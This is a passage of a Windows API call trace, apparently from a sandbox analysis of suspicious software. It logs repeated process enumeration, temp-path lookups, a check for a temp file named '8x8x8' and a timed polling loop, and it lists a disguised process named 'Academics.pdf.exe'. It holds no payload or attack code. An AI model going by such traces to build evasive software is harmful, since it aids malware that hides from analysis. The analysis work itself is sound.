lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0280.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0280.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0280.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0280.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0280.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0280.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0280.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0280.862] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0280.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0280.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0280.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0280.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0280.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0280.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0280.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0280.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x63c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0280.876] CloseHandle (hObject=0x294) returned 1 [0280.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0280.876] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.876] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0280.879] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.886] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.907] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0280.907] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.907] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0280.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0280.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0280.909] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0280.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0280.909] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0280.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0280.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0280.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0280.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0280.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0280.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0280.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0280.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0280.910] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0280.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0280.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0280.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0280.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0280.912] timeGetTime () returned 0x46517 [0280.912] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0280.912] Sleep (dwMilliseconds=0xa) [0280.925] timeGetTime () returned 0x46527 [0280.925] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0280.926] Sleep (dwMilliseconds=0xa) [0280.941] timeGetTime () returned 0x46537 [0280.941] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0280.941] Sleep (dwMilliseconds=0xa) [0280.956] timeGetTime () returned 0x46546 [0280.956] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0280.956] Sleep (dwMilliseconds=0xa) [0280.972] timeGetTime () returned 0x46556 [0280.972] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0280.972] Sleep (dwMilliseconds=0xa) [0280.988] timeGetTime () returned 0x46565 [0280.988] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0280.988] Sleep (dwMilliseconds=0xa) [0281.003] timeGetTime () returned 0x46575 [0281.003] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.003] Sleep (dwMilliseconds=0xa) [0281.019] timeGetTime () returned 0x46585 [0281.019] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.019] Sleep (dwMilliseconds=0xa) [0281.035] timeGetTime () returned 0x46594 [0281.035] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.035] Sleep (dwMilliseconds=0xa) [0281.050] timeGetTime () returned 0x465a4 [0281.050] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.050] Sleep (dwMilliseconds=0xa) [0281.071] timeGetTime () returned 0x465b3 [0281.072] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.073] Sleep (dwMilliseconds=0xa) [0281.082] timeGetTime () returned 0x465c3 [0281.082] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.082] Sleep (dwMilliseconds=0xa) [0281.100] timeGetTime () returned 0x465d3 [0281.100] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.100] Sleep (dwMilliseconds=0xa) [0281.112] timeGetTime () returned 0x465e2 [0281.112] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.113] Sleep (dwMilliseconds=0xa) [0281.128] timeGetTime () returned 0x465f2 [0281.128] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.128] Sleep (dwMilliseconds=0xa) [0281.144] timeGetTime () returned 0x46601 [0281.144] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.144] Sleep (dwMilliseconds=0xa) [0281.172] timeGetTime () returned 0x46611 [0281.172] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.172] Sleep (dwMilliseconds=0xa) [0281.176] timeGetTime () returned 0x46621 [0281.176] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0281.176] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0281.176] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0281.176] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0281.176] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0281.176] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.176] Sleep (dwMilliseconds=0xa) [0281.191] timeGetTime () returned 0x46630 [0281.191] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.191] Sleep (dwMilliseconds=0xa) [0281.206] timeGetTime () returned 0x46640 [0281.206] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.206] Sleep (dwMilliseconds=0xa) [0281.223] timeGetTime () returned 0x4664f [0281.223] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.223] Sleep (dwMilliseconds=0xa) [0281.237] timeGetTime () returned 0x4665f [0281.237] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.238] Sleep (dwMilliseconds=0xa) [0281.261] timeGetTime () returned 0x4666f [0281.261] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.262] Sleep (dwMilliseconds=0xa) [0281.270] timeGetTime () returned 0x4667e [0281.270] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0281.270] Sleep (dwMilliseconds=0xa) [0281.287] timeGetTime () returned 0x4668e [0281.287] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, 